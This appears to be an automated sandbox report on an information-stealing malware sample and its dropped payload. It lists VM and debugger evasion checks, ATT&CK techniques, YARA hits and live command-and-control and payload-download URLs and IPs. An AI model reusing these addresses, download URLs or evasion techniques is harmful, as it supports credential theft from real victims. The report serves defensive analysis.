                    Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.13.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.13.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.13.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.13.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.13.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: DADE.tmp.exe, 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.13.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.13.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.13.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.13.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.13.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.13.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.13.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                    Source: Amcache.hve.13.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeAPI call chain: ExitProcess graph end nodegraph_8-34119
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00404980 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,8_2_00404980
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00404980 VirtualProtect 00000000,00000004,00000100,?8_2_00404980
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00AF956B push dword ptr fs:[00000030h]0_2_00AF956B
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024B00C6 mov eax, dword ptr fs:[00000030h]0_2_024B00C6
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0248092B mov eax, dword ptr fs:[00000030h]0_2_0248092B
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_02480D90 mov eax, dword ptr fs:[00000030h]0_2_02480D90
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_004263C0 mov eax, dword ptr fs:[00000030h]8_2_004263C0
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009D0D90 mov eax, dword ptr fs:[00000030h]8_2_009D0D90
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009D092B mov eax, dword ptr fs:[00000030h]8_2_009D092B
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009F6627 mov eax, dword ptr fs:[00000030h]8_2_009F6627
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00A58FB3 push dword ptr fs:[00000030h]8_2_00A58FB3
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024AA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024AA63A
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0249073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0249073A
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0248FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0248FB78
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024908CD SetUnhandledExceptionFilter,0_2_024908CD
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009F784F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_009F784F
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009F9A10 SetUnhandledExceptionFilter,8_2_009F9A10
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009F7E31 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_009F7E31
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: DADE.tmp.exe PID: 564, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_004246C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,8_2_004246C0
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009F4897 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,8_2_009F4897
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009F4927 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,8_2_009F4927
                    Source: C:\Users\user\Desktop\ief722WreR.exeProcess created: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0041077B cpuid 0_2_0041077B
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: GetLocaleInfoW,0_2_004351C0
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: EnumSystemLocalesW,0_2_0043B2CD
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: EnumSystemLocalesW,0_2_0043B282
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: EnumSystemLocalesW,0_2_0043B368
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: GetLocaleInfoW,0_2_0043B645
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: GetLocaleInfoW,0_2_0043B875
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: EnumSystemLocalesW,0_2_00434DCD
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_024BB271
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: EnumSystemLocalesW,0_2_024B5034
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: GetLocaleInfoW,0_2_024B5427
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: EnumSystemLocalesW,0_2_024BB4E9
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: EnumSystemLocalesW,0_2_024BB534
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: EnumSystemLocalesW,0_2_024BB5CF
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: GetLocaleInfoW,0_2_024BBADC
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_024BBBA9
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: GetLocaleInfoW,0_2_024BB8AC
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: GetLocaleInfoW,0_2_024BB8A3
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_024BB9D5
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,8_2_009F2F67
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_004229E0 GetProcessHeap,HeapAlloc,GetUserNameA,8_2_004229E0
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009F6587 GetTimeZoneInformation,8_2_009F6587
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
                    Source: Amcache.hve.13.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.13.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.13.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.13.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.13.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 8.2.DADE.tmp.exe.9d0e67.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.DADE.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.3.DADE.tmp.exe.24e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.DADE.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.3.DADE.tmp.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.DADE.tmp.exe.9d0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.1314965093.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DADE.tmp.exe PID: 564, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 8.2.DADE.tmp.exe.9d0e67.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.DADE.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.3.DADE.tmp.exe.24e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.DADE.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.3.DADE.tmp.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.DADE.tmp.exe.9d0e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.1314965093.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DADE.tmp.exe PID: 564, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024A1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_024A1B33
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024A0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_024A0E5D
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    OS Credential Dumping2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Create Account
                    111
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol3
                    Clipboard Data
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                    Obfuscated Files or Information
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                    Software Packing
                    NTDS44
                    System Information Discovery
                    Distributed Component Object ModelInput Capture114
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets1
                    Query Registry
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials131
                    Security Software Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                    Process Injection
                    Proc Filesystem12
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    ief722WreR.exe45%ReversingLabs
                    ief722WreR.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\DADE.tmp.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe47%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\DADE.tmp.exe47%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://92.255.57.89/45c616e921a794b8.phpQ100%Avira URL Cloudmalware
                    http://92.255.57.89/697b92cb4e247842/sqlite3.dllll100%Avira URL Cloudmalware
                    http://92.255.57.89100%Avira URL Cloudmalware
                    http://92.255.57.89smss.exe0%Avira URL Cloudsafe
                    http://92.255.57.89/45c616e921a794b8.php100%Avira URL Cloudmalware
                    http://92.255.57.89/697b92cb4e247842/sqlite3.dllexe100%Avira URL Cloudmalware
                    http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE0%Avira URL Cloudsafe
                    http://92.255.57.89/45c616e921a794b8.phpwininit.exe100%Avira URL Cloudmalware
                    http://176.113.115.19/ScreenUpdateSync.exeM0%Avira URL Cloudsafe
                    http://92.255.57.89/697b92cb4e247842/sqlite3.dlll100%Avira URL Cloudmalware
                    http://92.255.57.89/100%Avira URL Cloudmalware
                    http://92.255.57.89/2b100%Avira URL Cloudmalware
                    http://92.255.57.89AKFBGC0%Avira URL Cloudsafe
                    http://176.113.115.19/ScreenUpdateSync.exexr0%Avira URL Cloudsafe
                    http://92.255.57.89/45c616e921a794b8.phpE100%Avira URL Cloudmalware
                    http://92.255.57.89/697b92cb4e247842/sqlite3.dll100%Avira URL Cloudmalware
                    http://176.113.115.19/ScreenUpdateSync.exe0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    post-to-me.com
                    104.21.56.70
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://92.255.57.89/45c616e921a794b8.phptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                        high
                        http://92.255.57.89/true
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://92.255.57.89/45c616e921a794b8.phpQDADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://92.255.57.89/697b92cb4e247842/sqlite3.dllllDADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://post-to-me.com/track_prt.php?sub=&cc=DEief722WreR.exe, 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                          high
                          http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWAREief722WreR.exe, 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://92.255.57.89DADE.tmp.exe, 00000008.00000002.1934043928.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmp, DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://92.255.57.89/697b92cb4e247842/sqlite3.dllexeDADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://92.255.57.89smss.exeDADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://post-to-me.com/track_prt.php?sub=ief722WreR.exefalse
                            high
                            http://92.255.57.89/697b92cb4e247842/sqlite3.dlllDADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://176.113.115.19/ScreenUpdateSync.exeMief722WreR.exe, 00000000.00000002.3677983339.0000000003200000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://92.255.57.89/45c616e921a794b8.phpwininit.exeDADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://post-to-me.com/ief722WreR.exe, 00000000.00000002.3676289540.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://92.255.57.89AKFBGCDADE.tmp.exe, 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://upx.sf.netAmcache.hve.13.drfalse
                                high
                                http://176.113.115.19/ScreenUpdateSync.exexrief722WreR.exe, 00000000.00000003.1296872109.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://92.255.57.89/45c616e921a794b8.phpEDADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                http://92.255.57.89/697b92cb4e247842/sqlite3.dllDADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                http://176.113.115.19/ScreenUpdateSync.exeief722WreR.exe, ief722WreR.exe, 00000000.00000003.3546343202.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000003.1296872109.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000003.1296872109.0000000000BA0000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000002.3676687673.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000002.3677983339.0000000003200000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://92.255.57.89/2bDADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                104.21.56.70
                                post-to-me.comUnited States
                                13335CLOUDFLARENETUSfalse
                                92.255.57.89
                                unknownRussian Federation
                                42253TELSPRUtrue
                                176.113.115.19
                                unknownRussian Federation
                                49505SELECTELRUfalse
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1572568
                                Start date and time:2024-12-10 17:41:10 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 19s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:19
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
